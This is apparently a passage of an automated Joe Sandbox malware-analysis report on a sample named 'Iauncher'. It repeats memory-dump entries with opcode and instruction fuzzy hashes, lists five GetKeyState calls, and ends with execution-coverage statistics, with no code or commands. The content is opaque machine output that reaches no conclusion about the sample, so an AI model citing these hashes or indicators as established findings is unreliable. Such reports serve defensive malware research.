                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ac5c6782653bac4b74504a9e8f9f62dd801e0b7f2105cb9ccdd365b33a82e44f
                                                                                                                                                    • Instruction ID: 6bf0828ea1c0ea8be4049c0d4853c8958aae9caff0188d5f5de4b8216f40a43a
                                                                                                                                                    • Opcode Fuzzy Hash: ac5c6782653bac4b74504a9e8f9f62dd801e0b7f2105cb9ccdd365b33a82e44f
                                                                                                                                                    • Instruction Fuzzy Hash: 81014B75E44208AFC700DFA4D098BEDBBF0EB4A310F1581E5D948A7351D7706E45CB85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ab33ce27328e68b052de4b731c15f26a88a0b0e8d30b734b93393e2310b44819
                                                                                                                                                    • Instruction ID: 0132973d849b2dfa4e65bf789495cba9477827a60ed3727a2c44101d934145dd
                                                                                                                                                    • Opcode Fuzzy Hash: ab33ce27328e68b052de4b731c15f26a88a0b0e8d30b734b93393e2310b44819
                                                                                                                                                    • Instruction Fuzzy Hash: 92F0CD6128E3844EDF1AA378A418765BF65EB43209F28C0EBD00CCA283C16BD486C376
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7dc7c43379cb8bfbca7a2b380b35c80540aaa97ee71278abced517f662d8725d
                                                                                                                                                    • Instruction ID: 14686071ac31701075ee614f2627a8e17c23ef629d24ab9a47260375bec9a871
                                                                                                                                                    • Opcode Fuzzy Hash: 7dc7c43379cb8bfbca7a2b380b35c80540aaa97ee71278abced517f662d8725d
                                                                                                                                                    • Instruction Fuzzy Hash: AEF0B430E50309ABCB00EBB4D8457ECF730FF82301F105266D11537190EB706A88CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d6ad275e02cb2218af30a698e4fda7706ee7df325e28ec0e7f15f7883151558a
                                                                                                                                                    • Instruction ID: 60841381e051c05fe474e0cd52738a8e76d5e1dabe73889ac0823cbc08f8c698
                                                                                                                                                    • Opcode Fuzzy Hash: d6ad275e02cb2218af30a698e4fda7706ee7df325e28ec0e7f15f7883151558a
                                                                                                                                                    • Instruction Fuzzy Hash: BAF05431E50309ABDB40EBE4D8946EDF735FFC3302F115626E15537190EB70AA58C655
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d98f9736e34a70033461d9b6c039a32c6764d36bd5c2f307059bd3bcb964d30
                                                                                                                                                    • Instruction ID: cca6215be30b85f1ad0320d13eca2a0c25a6721f4847204611310116810afd04
                                                                                                                                                    • Opcode Fuzzy Hash: 9d98f9736e34a70033461d9b6c039a32c6764d36bd5c2f307059bd3bcb964d30
                                                                                                                                                    • Instruction Fuzzy Hash: F3F0F471D45208AFDB40EFB4D891AAEBBB0EB46200F2095AA8418B3391E7705E41CB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4b9af44adaeb74d9e6dd918c9f8220a91610986a3baaf6ad31b2f2825ad9fa6f
                                                                                                                                                    • Instruction ID: d36f6ffdca5be1129bdb1bc5309d0e9d31990052b855422b9c4a588ced707fd9
                                                                                                                                                    • Opcode Fuzzy Hash: 4b9af44adaeb74d9e6dd918c9f8220a91610986a3baaf6ad31b2f2825ad9fa6f
                                                                                                                                                    • Instruction Fuzzy Hash: 92F0E770D45208EFDB45EFB8D8516ADBBF0AF46204F1095EAC419A32A0D7741E46CB45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 94bfcf98fcc47b0ccf96acd095ce59f26788e3c3ac569bb076bca54df39b3c0c
                                                                                                                                                    • Instruction ID: b3ff31294b123d45f0663e2ea168a727788df8f44aad0c5ef7056729341b4422
                                                                                                                                                    • Opcode Fuzzy Hash: 94bfcf98fcc47b0ccf96acd095ce59f26788e3c3ac569bb076bca54df39b3c0c
                                                                                                                                                    • Instruction Fuzzy Hash: 41011474E44208AFCB00DFA8D098BEDBBF0AB4A300F1081E4D94867351C7306A84CB45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 249af86a089b18388f20190cbcf36d2b43bc833c39d432169dbbc9ff494193eb
                                                                                                                                                    • Instruction ID: 86f6c337c25f5548232ba1703e44d5f5e162c2db55a4744590b66d90db2592dc
                                                                                                                                                    • Opcode Fuzzy Hash: 249af86a089b18388f20190cbcf36d2b43bc833c39d432169dbbc9ff494193eb
                                                                                                                                                    • Instruction Fuzzy Hash: 0AF0B7B1D05119AFDB44EFB8D4946ADBBF0FB89210F1095AA9818B3390EB715F41DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4d4c9babb4b0929a03a68ff591cc1eb658da516bec80fddea8c9eed8eee9bb66
                                                                                                                                                    • Instruction ID: 5af730d59c8ddc53610fb977c6aab915faacdd32ae992e68a9e1237da51a750a
                                                                                                                                                    • Opcode Fuzzy Hash: 4d4c9babb4b0929a03a68ff591cc1eb658da516bec80fddea8c9eed8eee9bb66
                                                                                                                                                    • Instruction Fuzzy Hash: 45F05835340A018FC728DE6EE85086AB7E9EF88622310856AE25EC7730CB60EC018B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 13b3d1fcda43c941aef8e453f5eb67c24fd0f41b7c669dc400cc7e90ed6701af
                                                                                                                                                    • Instruction ID: 891181e63c14e0d1dcc52bccff9a567c515594498f853d01351c4d797da93126
                                                                                                                                                    • Opcode Fuzzy Hash: 13b3d1fcda43c941aef8e453f5eb67c24fd0f41b7c669dc400cc7e90ed6701af
                                                                                                                                                    • Instruction Fuzzy Hash: 8FF03A7A904108FFCB42DF94D944ED9BF76EF49310F188095E9081B271D7329AA6EF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1b4d311f66d36cb89b0e8085d901a5f3e9af951d4f2587e9d82307b5aa0792c6
                                                                                                                                                    • Instruction ID: 79c6127bad6f28542f252973ac70da86c7e9f7fcf04df96c999f4ca55d6df64e
                                                                                                                                                    • Opcode Fuzzy Hash: 1b4d311f66d36cb89b0e8085d901a5f3e9af951d4f2587e9d82307b5aa0792c6
                                                                                                                                                    • Instruction Fuzzy Hash: ABF0E5B2F001156B8B14DA6AA810AAFBBAB8FD0264305C466A804D7254EE308E014B94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8a642051ad6334cffd52d4b8f72c3781040aed25bd124739116bc28c5094951f
                                                                                                                                                    • Instruction ID: 6cc3e3ffb19c65cf5fc18e1bbb7c81d4c0ad301473b94175509878f3b584c381
                                                                                                                                                    • Opcode Fuzzy Hash: 8a642051ad6334cffd52d4b8f72c3781040aed25bd124739116bc28c5094951f
                                                                                                                                                    • Instruction Fuzzy Hash: 65E068333406142BE3219609EC01F9ABBCACBD4712F084126F204DB2C1C9E5F80283A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 41aa86987bd2d89ef3b5adfd4e7463f34ac60e7f54f4acae41b344bea433f83e
                                                                                                                                                    • Instruction ID: 2e62d933a43202e7dd96319a9a6cfbc7b71b0a8ff5dfc76a7a92dd2bae089c6a
                                                                                                                                                    • Opcode Fuzzy Hash: 41aa86987bd2d89ef3b5adfd4e7463f34ac60e7f54f4acae41b344bea433f83e
                                                                                                                                                    • Instruction Fuzzy Hash: A4E0C27BA40119BBDF018E85ED45FDA7FA9FF9C665F064111FE08A7250C232D821EBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aa07065032cca63fde8d364b65ab7b061a8fea19ab75cda383dc0860ce9cd846
                                                                                                                                                    • Instruction ID: 84b33e50e284b5f5502e0ddddc1101389e4fd58b4f1b872afabab9edab6a1efc
                                                                                                                                                    • Opcode Fuzzy Hash: aa07065032cca63fde8d364b65ab7b061a8fea19ab75cda383dc0860ce9cd846
                                                                                                                                                    • Instruction Fuzzy Hash: F0F03035904208EBCF01EFA8D8449ADBB75FF45300F10C259E84827221DB319A91EB41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e71a4205c42b6357f9d21584303f2c3992dc667b49c31f2d14873ed4444a5750
                                                                                                                                                    • Instruction ID: 848d3e27b382d0a13dcbda8ce9444441b345c32f47e0392e2bb048802eb2bdd1
                                                                                                                                                    • Opcode Fuzzy Hash: e71a4205c42b6357f9d21584303f2c3992dc667b49c31f2d14873ed4444a5750
                                                                                                                                                    • Instruction Fuzzy Hash: 16E0DF323101189BC7108A6DF888CAAB7EAEBC8775B008077F608C7310CF71C802C790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f6bd19c40b1921fd5402dbeb5903b94da8af6717e85ad494350fe4ff122aa5e7
                                                                                                                                                    • Instruction ID: 098fc06f5c7cd077d30b70b8a6ab1ca45031a42c6c468d53f6839c5c61b185ec
                                                                                                                                                    • Opcode Fuzzy Hash: f6bd19c40b1921fd5402dbeb5903b94da8af6717e85ad494350fe4ff122aa5e7
                                                                                                                                                    • Instruction Fuzzy Hash: 48B09237E0400ACADB108A96B4453EDF760FB80369F104023C31052000C23201748692
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyState.USER32(00000001), ref: 09BF23ED
                                                                                                                                                    • GetKeyState.USER32(00000002), ref: 09BF2432
                                                                                                                                                    • GetKeyState.USER32(00000004), ref: 09BF2477
                                                                                                                                                    • GetKeyState.USER32(00000005), ref: 09BF24BC
                                                                                                                                                    • GetKeyState.USER32(00000006), ref: 09BF2501
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1649606143-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: pq
                                                                                                                                                    • API String ID: 0-153521182
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9ecd282a80144907692472c8a8877a68d80c1bc3a98daccb7b00acd0e9fae4ef
                                                                                                                                                    • Instruction ID: 0811ce5e1bbbdf0aad33591e2511948cd15b78e94c88e023f81320b05e7265c4
                                                                                                                                                    • Opcode Fuzzy Hash: 9ecd282a80144907692472c8a8877a68d80c1bc3a98daccb7b00acd0e9fae4ef
                                                                                                                                                    • Instruction Fuzzy Hash: D641E570E00219CFEB04DFA8D584BEEBBB2EB49301F10446AD412B7391D774AA45CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f574449eb9929ea265046054e642c5e9c9d846e43730972ec100065fb4ddbaf7
                                                                                                                                                    • Instruction ID: 159601de5a6a91e48944d5d18a712da7b9757cd342a032164f9dd712bdc17604
                                                                                                                                                    • Opcode Fuzzy Hash: f574449eb9929ea265046054e642c5e9c9d846e43730972ec100065fb4ddbaf7
                                                                                                                                                    • Instruction Fuzzy Hash: 8231E570E00219CFEB04DFA9D588BEEBBB2FB48301F10446AD411B7390D774AA45CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 97a4a17a1aa6b66ea2f3b7503c94e638f51f8e082e1d528ab67d8593a335f09d
                                                                                                                                                    • Instruction ID: b4ef15ab281b37ce2a79a419e6b976d1e227b89e379b405fccd991553571ab1e
                                                                                                                                                    • Opcode Fuzzy Hash: 97a4a17a1aa6b66ea2f3b7503c94e638f51f8e082e1d528ab67d8593a335f09d
                                                                                                                                                    • Instruction Fuzzy Hash: CEF06275F002099FDB00DFA8D844ADEBBF5EB4A221F1041A6E519E7351D671ED018B65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:5.2%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0.9%
                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                    Total number of Limit Nodes:79
